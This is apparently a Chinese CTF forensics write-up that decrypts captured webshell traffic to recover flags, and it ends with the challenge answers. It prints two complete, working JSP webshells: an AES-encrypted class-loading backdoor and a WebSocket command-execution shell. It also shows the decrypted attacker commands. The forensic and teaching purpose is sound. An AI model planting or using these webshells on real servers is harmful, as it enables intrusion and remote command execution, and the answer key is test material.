获取密钥
流量包39上传了一个zip,解压出来有一个1.jsp
<%! String xc="3c6e0b8a9c15224a"; String pass="ctfisfun"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){} %> |
变量xc(密钥)作AES的密钥,密钥16字节,对应也就是AES128
变量pass(密码)作请求包的item的头部,如图:
后面有个MD5操作其实是计算了 pass+xc
的MD5
MD5(3c6e0b8a9c15224a) --> 49b3c226f3e5f760fd90ec52257b31ef |
返回包:
"49b3c226f3e5f760" + AES128加密后base64编码内容 + "fd90ec52257b31ef" |
下面是我随便找的一个返回包: 49B3C226F3E5F760LF/IpkPvM0iJI4wmpBs2DaoBVvcbDMpwuL7nYS3n/k4=FD90EC52257B31EF |
如何解密
- 请求包解密,
CyberChef
配方
URL_Decode() From_Base64('A-Za-z0-9+/=',true,false) AES_Decrypt({'option':'UTF8','string':'3c6e0b8a9c15224a'},{'option':'Hex','string':''},'ECB','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''}) Gunzip() |
- 返回包解密,
CyberChef
配方
自己先手动删掉前16和后16的字符串
From_Base64('A-Za-z0-9+/=',true,false) AES_Decrypt({'option':'UTF8','string':'3c6e0b8a9c15224a'},{'option':'Hex','string':''},'ECB','Raw','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''}) Gunzip() |
示例:
请求包130
返回包136
按照上面步骤解密出所有的密文:
120请求包 file 1.class 反编译 没啥用 122返回包 空 145请求包 fileName...../home/ctf/.bash_historymethodName.....readFile 147返回包 ls openssl enc -e -aes256 -pass pass:"P@ssW0rd" -in flag.png -out encflag ls rm flag.png sudo ./bin/startup.sh history -w 156请求包 methodName.....getFiledirName.+.../home/ctf/Desktop/apache-tomcat-8.5.82/bin/ 158返回包 ok /home/ctf/Desktop/apache-tomcat-8.5.82/bin/ tool-wrapper.sh 1 2022-08-08 14:26:07 5540 RWX setclasspath.sh 1 2022-08-08 14:26:07 3708 RWX digest.bat 1 2022-08-08 14:26:07 2091 RW digest.sh 1 2022-08-08 14:26:07 1965 RWX commons-daemon-native.tar.gz 1 2022-08-08 14:26:07 211777 RW tomcat-juli.jar 1 2022-08-08 14:26:07 51542 RW catalina.bat 1 2022-08-08 14:26:07 16840 RW tomcat-native.tar.gz 1 2022-08-08 14:26:07 436593 RW ciphers.sh 1 2022-08-08 14:26:07 1997 RWX shutdown.bat 1 2022-08-08 14:26:07 2020 RW version.bat 1 2022-08-08 14:26:07 2026 RW bootstrap.jar 1 2022-08-08 14:26:07 36191 RW daemon.sh 1 2022-08-08 14:26:07 9100 RWX version.sh 1 2022-08-08 14:26:07 1908 RWX startup.sh 1 2022-08-08 14:26:07 1904 RWX startup.bat 1 2022-08-08 14:26:07 2022 RW commons-daemon.jar 1 2022-08-08 14:26:07 25410 RW shutdown.sh 1 2022-08-08 14:26:07 1902 RWX ciphers.bat 1 2022-08-08 14:26:07 2123 RW setclasspath.bat 1 2022-08-08 14:26:07 3460 RW configtest.sh 1 2022-08-08 14:26:07 1922 RWX tool-wrapper.bat 1 2022-08-08 14:26:07 4574 RW catalina.sh 1 2022-08-08 14:26:07 25294 RWX configtest.bat 1 2022-08-08 14:26:07 2040 RW catalina-tasks.xml 1 2022-08-08 14:26:07 1664 RW 161请求包 methodName.....getFiledirName.'.../home/ctf/Desktop/apache-tomcat-8.5.82/ 163返回包 ok /home/ctf/Desktop/apache-tomcat-8.5.82/ temp 0 2022-10-04 10:31:38 4096 RWX NOTICE 1 2022-08-08 14:26:07 1726 RW encflag 1 2022-10-04 11:56:12 1504 RW bin 0 2022-08-08 14:26:07 4096 RWX webapps 0 2022-10-04 11:57:28 4096 RWX work 0 2022-10-04 10:05:08 4096 RWX lib 0 2022-08-08 14:26:07 4096 RWX LICENSE 1 2022-08-08 14:26:07 57011 RW README.md 1 2022-08-08 14:26:07 3398 RW BUILDING.txt 1 2022-08-08 14:26:07 19992 RW logs 0 2022-10-04 10:05:08 4096 RWX RUNNING.txt 1 2022-08-08 14:26:07 16505 RW RELEASE-NOTES 1 2022-08-08 14:26:07 7139 RW CONTRIBUTING.md 1 2022-08-08 14:26:07 6210 RW conf 0 2022-10-04 10:05:08 4096 RWX 166请求包 methodName.....getFiledirName./.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/ 168返回包 ok /home/ctf/Desktop/apache-tomcat-8.5.82/webapps/ host-manager 0 2022-08-08 14:26:07 4096 RWX 1 0 2022-10-04 11:57:28 4096 RWX docs 0 2022-08-08 14:26:07 4096 RWX 1.war 1 2022-10-04 11:57:28 1063 RW examples 0 2022-08-08 14:26:07 4096 RWX manager 0 2022-08-08 14:26:07 4096 RWX ROOT 0 2022-08-08 14:26:07 4096 RWX 171请求包 methodName.....getFiledirName.1.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/ 173返回包 ok /home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/ META-INF 0 2022-10-04 11:57:28 4096 RWX 1.jsp 1 2022-10-03 11:30:15 2621 RW 183请求包 fileName.8.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/wbs.jspfileValue.Ä...<%@ page import="javax.websocket.server.ServerEndpointConfig" %> <%@ page import="javax.websocket.server.ServerContainer" %> <%@ page import="javax.websocket.*" %> <%@ page import="java.io.*" %> <%! public static class C extends Endpoint implements MessageHandler.Whole<String> { private Session session; @Override public void onMessage(String s) { try { Process process; boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows"); if (bool) { process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s }); } else { process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s }); } InputStream inputStream = process.getInputStream(); StringBuilder stringBuilder = new StringBuilder(); int i; while ((i = inputStream.read()) != -1) stringBuilder.append((char)i); inputStream.close(); process.waitFor(); session.getBasicRemote().sendText(stringBuilder.toString()); } catch (Exception exception) { exception.printStackTrace(); } } @Override public void onOpen(final Session session, EndpointConfig config) { this.session = session; session.addMessageHandler(this); } } %> <% String path = request.getParameter("path"); ServletContext servletContext = request.getSession().getServletContext(); ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(C.class, path).build(); ServerContainer container = (ServerContainer) servletContext.getAttribute(ServerContainer.class.getName()); try { if (servletContext.getAttribute(path) == null){ container.addEndpoint(configEndpoint); servletContext.setAttribute(path,path); } out.println("success, connect url path: " + servletContext.getContextPath() + path); } catch (Exception e) { out.println(e.toString()); } %>methodName. ...uploadFile 185返回包 ok 188请求包 methodName.....getFiledirName.1.../home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/ 190返回包 ok /home/ctf/Desktop/apache-tomcat-8.5.82/webapps/1/ META-INF 0 2022-10-04 11:57:28 4096 RWX 1.jsp 1 2022-10-03 11:30:15 2621 RW wbs.jsp 1 2022-10-04 11:58:52 2244 RW 193请求包 cmdLine.f...bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswru" 2>&1arg-3.....2>&1executableFile.....bashexecutableArgs.a...-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswru" 2>&1arg-0.....bashargsCount.....4arg-1.....-carg-2.W...cd "/home/ctf/Desktop/apache-tomcat-8.5.82/bin/";cd ".."&&echo CYrXIi&&pwd&&echo rHswrumethodName.....execCommand 195返回包 CYrXIi /home/ctf/Desktop/apache-tomcat-8.5.82 rHswru 198请求包 cmdLine.=...bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";ls" 2>&1arg-3.....2>&1executableFile.....bashexecutableArgs.8...-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";ls" 2>&1arg-0.....bashargsCount.....4arg-1.....-carg-2.....cd "/home/ctf/Desktop/apache-tomcat-8.5.82";lsmethodName.....execCommand 200返回包 bin BUILDING.txt conf CONTRIBUTING.md encflag lib LICENSE logs NOTICE README.md RELEASE-NOTES RUNNING.txt temp webapps work 209请求包 cmdLine.O...bash -c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64" 2>&1arg-3.....2>&1executableFile.....bashexecutableArgs.J...-c "cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64" 2>&1arg-0.....bashargsCount.....4arg-1.....-carg-2.@...cd "/home/ctf/Desktop/apache-tomcat-8.5.82";cat encflag | base64methodName.....execCommand 212返回包 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 zr+rfY//7foF0uxdoBwucWBJqHuMHw== |
1.请写出黑客第一次上传的木马的密码
1.jsp文件里面的pass变量就是密码
ctfisfun |
2.请写出黑客第一次连接之后,给flag图片加密的密码
147返回包 ls openssl enc -e -aes256 -pass pass:"P@ssW0rd" -in flag.png -out encflag ls rm flag.png sudo ./bin/startup.sh history -w |
P@ssW0rd |
3.请写出flag.png中flag内容,格式:flag{…}
encflag就是最后一个返回包的base64字符串
openssl base64 -d -aes256 -pass pass:P@ssW0rd -in encflag -out flag.png |
flag{740afc12-43fe-11ed-b97f-00155d98d274} |
4.请问黑客新建了一个用户,用户名是什么?
Hacker@12345 |
5.请写出最后输出的flag,格式:flag{…}
flag{45a61e64-434b-11ed-a260-00155d98bc46}